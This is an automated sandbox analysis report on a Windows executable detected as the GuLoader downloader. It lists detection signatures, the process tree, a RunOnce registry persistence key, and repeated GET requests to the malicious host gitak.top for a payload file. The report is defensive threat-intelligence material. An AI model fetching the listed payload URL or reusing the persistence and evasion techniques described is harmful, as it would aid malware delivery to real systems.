Windows Analysis Report
WEAREX_IHRACAT.exe

Overview

General Information

Sample name:WEAREX_IHRACAT.exe
Analysis ID:1501093
MD5:2e620407c0b25239ef46534a34217c27
SHA1:1751f775e9e9279757ec94c9f4cf63b01af42525
SHA256:a49b3780d9a1af972b0e6d252284edff3b00e35713336456579431f1081debe4

Detection

GuLoader
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • WEAREX_IHRACAT.exe (PID: 8804 cmdline: "C:\Users\user\Desktop\WEAREX_IHRACAT.exe" MD5: 2E620407C0B25239EF46534A34217C27)
    • WEAREX_IHRACAT.exe (PID: 6300 cmdline: "C:\Users\user\Desktop\WEAREX_IHRACAT.exe" MD5: 2E620407C0B25239EF46534A34217C27)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.6650157112.0000000001721000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000000.00000002.2455393389.00000000031C1000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

      System Summary

      Source: Registry Key set, Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\Pregnancy\Caterva.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\WEAREX_IHRACAT.exe, ProcessId: 6300, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Aaregang
      Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Pregnancy\Caterva.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\WEAREX_IHRACAT.exe, ProcessId: 6300, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Aaregang


      AV Detection

      Source: gitak.top, Virustotal: Detection: 22%
      Source: https://gitak.top/dmAaHCQMI79.bin, Virustotal: Detection: 19%
      Source: C:\Users\user\AppData\Local\Temp\Pregnancy\Caterva.exe, ReversingLabs: Detection: 57%
      Source: WEAREX_IHRACAT.exe, ReversingLabs: Detection: 57%
      Source: WEAREX_IHRACAT.exe, Virustotal: Detection: 70%
      Source: WEAREX_IHRACAT.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknown, HTTPS traffic detected: 172.67.207.219:443 -> 192.168.11.20:49776 version: TLS 1.2
      Source: Binary string: mshtml.pdb source: WEAREX_IHRACAT.exe, 00000002.00000001.1798696574.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: mshtml.pdbUGP source: WEAREX_IHRACAT.exe, 00000002.00000001.1798696574.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe, Code function: 0_2_0040276E FindFirstFileW,0_2_0040276E
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe, Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
      Source: C:\Users\user\Desktop\WEAREX_IHRACAT.exe, Code function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
      Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49776 -> 172.67.207.219:443
      Source: global traffic, HTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /dmAaHCQMI79.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
      Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global traffic DNS traffic detected: DNS query: gitak.top
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:40:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: MISSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6RtkS5n2C9K8mjiAQPIkIP9T88mXoVLDUFQwJUfSU5sWwsYGnJKDIxQnhTK%2BYG5ngpEcRf5RfEbq4xB%2BvWG1QUI17VL2JbGYWyhEsdLzTqLMGDmjiPOeBBprfnY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babec105a2956ec-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:40:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 10Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MLabE8DPPtKS9rn%2FTmLbROV6pDDQFvRUk5aR5YeVnvTApARwxz%2F8eMLXqLjU1H2LPDuTGQXlPnvkwrSU8v3J6RPJcu5I7EI7q06db33Ur7Nef7zicxytRomCyHM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babec535dbf2d28-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:40:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 21Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qWXXS2NrwTGdUxdtZPpsZTpq8PP%2Bh4tk92eB%2FEd5X13HxWMvQ%2B6NdI2shR5ctT2z8oU1E4HTXmPeGexsCOi5j4W%2FHdkE0kdFxfXspk4Tk%2Bm1yHedovEr5Pti9IA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babec950eb559f1-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:40:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 31Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K0fWlft6fUQ4S4m4KlgLPN5GN2AGQUD7AL7zviH7Ky3zISp6ZpHnfTQrQtdHPn3GPqoPei3sBc5gN1WUIihvF5Y%2BpAf7A4Bpcdnl1W%2BRSByVg3wQsjOuM3azODM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babecd6edd32d15-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:41:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 42Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vGiHI3lLvT9Gur%2FzlVH2DRekG2i01nj0wF8JaD0PDHAb3Vx3HLZBTbOoe87ew2QVaaNRadhADqYBGLdObIr7C8zJRuT68CpYshrP3ekInFYY3JTra00i0dP02DA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babed18a9bb082e-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:41:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 52Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i7gL3sdbOuJzSEcJkT99MXrxL780mMWdYRsl3RrCszGJhf9VuZqfcXQG0z6504sWRm1nsGiSL4fIXJA2sCPjAZe5kDXg2AB3Xa9%2BYi2a0kOCrOsKiLgG0cxQFTo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babed5a69411fd4-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:41:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 63Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F5b2RW%2Fj%2BT4RrEZWx4D%2FnyakwG90IGNXz%2Fl%2Fy9eJcEXVaz99bZLUGlNYOClAFPHSWDkTInHh3OqeupG1uIY%2FCy1DDISV8N41MvZpYqErhYiSpEZDk9JPknQQYf8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babed9c1cd9c584-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:41:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 73Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3xhKipF4ZA8%2Bkvdd%2BU1F%2BrBg4eynZTN%2BjBDWj9bgfGgH%2BilT3MDXaYBqPidLk%2BHIjGpOJ1KV5XU%2BxKhXjAr%2FlM%2FPDMyPa%2BmW65B7puXv5TX78IU5IOvcZbn8wsk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babedddcc3059df-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:41:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 84Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EoNQvU%2F68bPKsSQUFFONu8irGKTbWrh9ZiAyCeTfaGqzkT7pMFpOm5qS5cv%2BpGcO9DD5iqwclNCCrU5vtum1PhltMVpXIYst3f8%2BQdM1rJzMTQXGTSBbOxZT56Q%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babee1f886782ec-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:41:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 94Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hwkKcTa3VXkc7R9rQYkkb4eqPmY8q4UzebAK8gzZsZ4XJBRVEUF19Zbfu0H4L7Gp15nI4QJZ7M5%2F%2Fm8bIekDe9NEAW9JWIima4oQgcnbn1Gr3bjWeb6%2F2hGaJTo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babee614a62c968-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:42:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 105Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=13eTPd51Zx4b9EW4xNYd4Zei8NPIGF4uqYtQUC%2BvF7tiLZ45S6fm%2B4M7DPeBk7meYNsqfYwxRKlb%2BQqUwjx4TJBXNlEP7Z%2FylcPwqo20X09H0aQMyGuOzkdWb64%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babeea32f3d061c-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:42:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 115Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MqmBalLXHAr8qRHykb93s7Lp50lREcKDyK8n%2Bv3wMBlsq8eWm%2FglNpbgr71VKPXaN9RNmJINX9aly%2FjGoZjXd5KoUWa3uB7RDsG05r8TwF7mWPTyTmQB3N%2Fsh6c%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babeee4daa80854-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:42:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 126Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qBfD0KFqKH%2FjuEPqXLGmfVRvGlYJ7xonfYKsjAuioIk3mZ0nD9XfU%2BsdBUtdQhBZsKK5pD6i%2FUtbiuoTH6VFzUzLjhCbEFyDCq93DypeKvLBwuv6cw7Or8rps0k%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babef268d5d2d0e-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:42:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 136Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qXfiXuYJ4hadXmEM7sONEP2m4MQat6SkERSgInyk3olB8%2FyTCkHB9wvTJz%2BgVW0ZWgn4wzpHY%2FvjdL3Nm%2Fo0G%2Fw%2BeVKfHB1ZsNgSW49r3D78mp37yvegGleUReY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babef686b810737-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:42:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 147Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sKbW1Y4HPTxcwBPBIxIFuOUjsGbsPaM6IiXAd0gCMmTFMP9875X41jv%2FHIB2pY3JVz7Pai9QieunjV56GiHCRUmj5a0Az4aB3jgFZq%2BDhZf%2B8td4V0P0WY4tXPY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babefaa5a9a81b7-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:42:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 158Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ACR1CIV4FDjAhd2ezzKBo%2B%2BmCDuOxvybSxgwkG%2BbAd5HU8pi0XXVuQciCGeO3g2yq6%2BYdcmvE1zckugScTv%2Bv9j6Z6OLnGK86IWyAqmiaNLNoz6qlN7YsvRc8vA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babefec688805f3-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:43:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 168Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U7Th%2F8Vb4dHHXArb7cx59BBVc87nvJf%2FkctRSGb54018w3bD7fVg3zI5%2Fec8AKupGUwgCcLMuJ0n9cCjXQASLw1zbGqJkvhSaaPE8zL3nDYgQoyt6XKX7OcSQdM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf02e69c8172f-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:43:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 179Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dbk%2FKlA5H5JLhG8PPhB65XbwQbdmh%2BQuyX7czVbll9LXT2Gn6wLrXAg2J01sP%2BrLITcKC2G80RJdaTG2N3GJ00IoPwRLkpY2uN0YM7%2Bs37rw0vlUL%2BiDrvlu77o%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf0706a5c05ce-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:43:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Od4qaBQE%2FtUECG2uHXncFSGFpGy%2BElvcGv%2F4Zuev9uqQg3CYtB0J5RH5UGOt1uAq3oNKrZGFbXkZC5ZN8paB1%2F2pdPTk02kUIZNS3jKtbuNJRKQgd08JUWCvWLc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf0b24fe40609-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:43:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 11Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=woX15csC0YOdsa1t8EAgxqkSaWKCCfkIOd%2Bw7Tlq0AZCVdXVwSZi9akJ%2FX4%2Fz%2FDXfb2Z8hEgZN1RbvaspsX9mjx7%2B5K8T45kDCrg9oMv%2BNEBzj31wMu03OoMeCU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf0f58f11c97c-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:43:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 21Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4jLzCJsXLh%2FbWWp8BjVWVvbN3PyjdVuDU6cM5nc8f7Z%2Bx3yGVBy1YNlbzREWZFtOZoFTWPylOsvMeUFnOmg90cQlbqRlz5twBb0gZcQF0EnzDJeFM8C7NTFqGUo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf1371bc759ce-IADalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 29 Aug 2024 10:43:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 27 Aug 2024 00:54:25 GMTCache-Control: max-age=14400CF-Cache-Status: HITAge: 32Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=66FqERb112nzweANwbLdsasmMz7%2FDYqGhx8TV%2BInDLuRcE3Xe9%2Fo0CcLb1X7S4Ag3zmA6d8YHlL7KsnZVtsScPJoowdkcYp3L01kOBtHiO2kCiw%2Bl5qVENt0YzA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8babf17898bac9bc-IADalt-svc: h3=":443"; ma=86400
